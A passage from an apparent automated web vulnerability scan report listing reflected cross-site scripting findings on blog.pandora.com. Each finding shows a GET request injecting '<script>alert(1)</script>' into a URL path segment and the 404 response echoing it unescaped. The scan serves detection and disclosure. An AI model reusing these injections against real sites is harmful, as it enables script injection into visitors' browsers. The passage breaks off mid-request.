<p>The requested URL /pandora/archives/2010/1093473<script>alert(1)</script>78dc3d1265/an-update-on-pa.html was not found on this server.</p>
...[SNIP]...

1.265. http://blog.pandora.com/pandora/archives/2010/10/an-update-on-pa.html [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2010/10/an-update-on-pa.html

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 57715<script>alert(1)</script>6156d1c3fc4 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2010/10/an-update-on-pa.html57715<script>alert(1)</script>6156d1c3fc4 HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:49 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 369


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2010/10/an-update-on-pa.html57715<script>alert(1)</script>6156d1c3fc4 was not found on this server.</p>
...[SNIP]...

1.266. http://blog.pandora.com/pandora/archives/2010/10/hoboken-town-ha.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2010/10/hoboken-town-ha.html

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload a04ff<script>alert(1)</script>1d9d8606f67 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandoraa04ff<script>alert(1)</script>1d9d8606f67/archives/2010/10/hoboken-town-ha.html HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:24 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 369


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandoraa04ff<script>alert(1)</script>1d9d8606f67/archives/2010/10/hoboken-town-ha.html was not found on this server.</p>
...[SNIP]...

1.267. http://blog.pandora.com/pandora/archives/2010/10/hoboken-town-ha.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2010/10/hoboken-town-ha.html

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 6b806<script>alert(1)</script>2370e6bb9b0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives6b806<script>alert(1)</script>2370e6bb9b0/2010/10/hoboken-town-ha.html HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:28 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Content-Length: 369
Connection: close
Content-Type: text/html


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives6b806<script>alert(1)</script>2370e6bb9b0/2010/10/hoboken-town-ha.html was not found on this server.</p>
...[SNIP]...

1.268. http://blog.pandora.com/pandora/archives/2010/10/hoboken-town-ha.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2010/10/hoboken-town-ha.html

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 8496d<script>alert(1)</script>895ffd7f0fa was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/20108496d<script>alert(1)</script>895ffd7f0fa/10/hoboken-town-ha.html HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:30 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 369


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/20108496d<script>alert(1)</script>895ffd7f0fa/10/hoboken-town-ha.html was not found on this server.</p>
...[SNIP]...

1.269. http://blog.pandora.com/pandora/archives/2010/10/hoboken-town-ha.html [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2010/10/hoboken-town-ha.html

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 297e2<script>alert(1)</script>6746ce0f566 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2010/10297e2<script>alert(1)</script>6746ce0f566/hoboken-town-ha.html HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:36 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 369


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2010/10297e2<script>alert(1)</script>6746ce0f566/hoboken-town-ha.html was not found on this server.</p>
...[SNIP]...

1.270. http://blog.pandora.com/pandora/archives/2010/10/hoboken-town-ha.html [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2010/10/hoboken-town-ha.html

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 5a107<script>alert(1)</script>7d716b47026 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2010/10/hoboken-town-ha.html5a107<script>alert(1)</script>7d716b47026 HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:41 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 369


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2010/10/hoboken-town-ha.html5a107<script>alert(1)</script>7d716b47026 was not found on this server.</p>
...[SNIP]...

1.271. http://blog.pandora.com/pandora/archives/2010/10/pandora-one-gif.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2010/10/pandora-one-gif.html

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload aeade<script>alert(1)</script>36a25f2db79 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandoraaeade<script>alert(1)</script>36a25f2db79/archives/2010/10/pandora-one-gif.html HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:35 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 369


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandoraaeade<script>alert(1)</script>36a25f2db79/archives/2010/10/pandora-one-gif.html was not found on this server.</p>
...[SNIP]...

1.272. http://blog.pandora.com/pandora/archives/2010/10/pandora-one-gif.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2010/10/pandora-one-gif.html

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 5f952<script>alert(1)</script>8da5452ad57 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives5f952<script>alert(1)</script>8da5452ad57/2010/10/pandora-one-gif.html HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:37 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 369


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives5f952<script>alert(1)</script>8da5452ad57/2010/10/pandora-one-gif.html was not found on this server.</p>
...[SNIP]...

1.273. http://blog.pandora.com/pandora/archives/2010/10/pandora-one-gif.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2010/10/pandora-one-gif.html

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 2f17b<script>alert(1)</script>64bc9a276f8 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/20102f17b<script>alert(1)</script>64bc9a276f8/10/pandora-one-gif.html HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:39 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 369


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/20102f17b<script>alert(1)</script>64bc9a276f8/10/pandora-one-gif.html was not found on this server.</p>
...[SNIP]...

1.274. http://blog.pandora.com/pandora/archives/2010/10/pandora-one-gif.html [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2010/10/pandora-one-gif.html

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 976b9<script>alert(1)</script>41935888f21 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2010/10976b9<script>alert(1)</script>41935888f21/pandora-one-gif.html HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:42 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 369


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2010/10976b9<script>alert(1)</script>41935888f21/pandora-one-gif.html was not found on this server.</p>
...[SNIP]...

1.275. http://blog.pandora.com/pandora/archives/2010/10/pandora-one-gif.html [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2010/10/pandora-one-gif.html

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 27156<script>alert(1)</script>bb3cfa82e19 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2010/10/pandora-one-gif.html27156<script>alert(1)</script>bb3cfa82e19 HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:45 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 369


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2010/10/pandora-one-gif.html27156<script>alert(1)</script>bb3cfa82e19 was not found on this server.</p>
...[SNIP]...

1.276. http://blog.pandora.com/pandora/archives/2010/11/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2010/11/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 27324<script>alert(1)</script>f28ce60039 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora27324<script>alert(1)</script>f28ce60039/archives/2010/11/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:14 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 348


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora27324<script>alert(1)</script>f28ce60039/archives/2010/11/ was not found on this server.</p>
...[SNIP]...

1.277. http://blog.pandora.com/pandora/archives/2010/11/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2010/11/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 31461<script>alert(1)</script>df1666c9e6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives31461<script>alert(1)</script>df1666c9e6/2010/11/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:17 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 348


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives31461<script>alert(1)</script>df1666c9e6/2010/11/ was not found on this server.</p>
...[SNIP]...

1.278. http://blog.pandora.com/pandora/archives/2010/11/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2010/11/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload a1142<script>alert(1)</script>f83864e82ca was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2010a1142<script>alert(1)</script>f83864e82ca/11/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:19 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2010a1142<script>alert(1)</script>f83864e82ca/11/ was not found on this server.</p>
...[SNIP]...

1.279. http://blog.pandora.com/pandora/archives/2010/11/ [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2010/11/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 8f51a<script>alert(1)</script>191470466ea was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2010/118f51a<script>alert(1)</script>191470466ea/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:22 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2010/118f51a<script>alert(1)</script>191470466ea/ was not found on this server.</p>
...[SNIP]...

1.280. http://blog.pandora.com/pandora/archives/2010/11/fantastic-fargo.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2010/11/fantastic-fargo.html

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 72e6e<script>alert(1)</script>09b739b49da was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora72e6e<script>alert(1)</script>09b739b49da/archives/2010/11/fantastic-fargo.html HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:23 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 369


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora72e6e<script>alert(1)</script>09b739b49da/archives/2010/11/fantastic-fargo.html was not found on this server.</p>
...[SNIP]...

1.281. http://blog.pandora.com/pandora/archives/2010/11/fantastic-fargo.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2010/11/fantastic-fargo.html

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload a3828<script>alert(1)</script>87512ebd2ab was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archivesa3828<script>alert(1)</script>87512ebd2ab/2010/11/fantastic-fargo.html HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
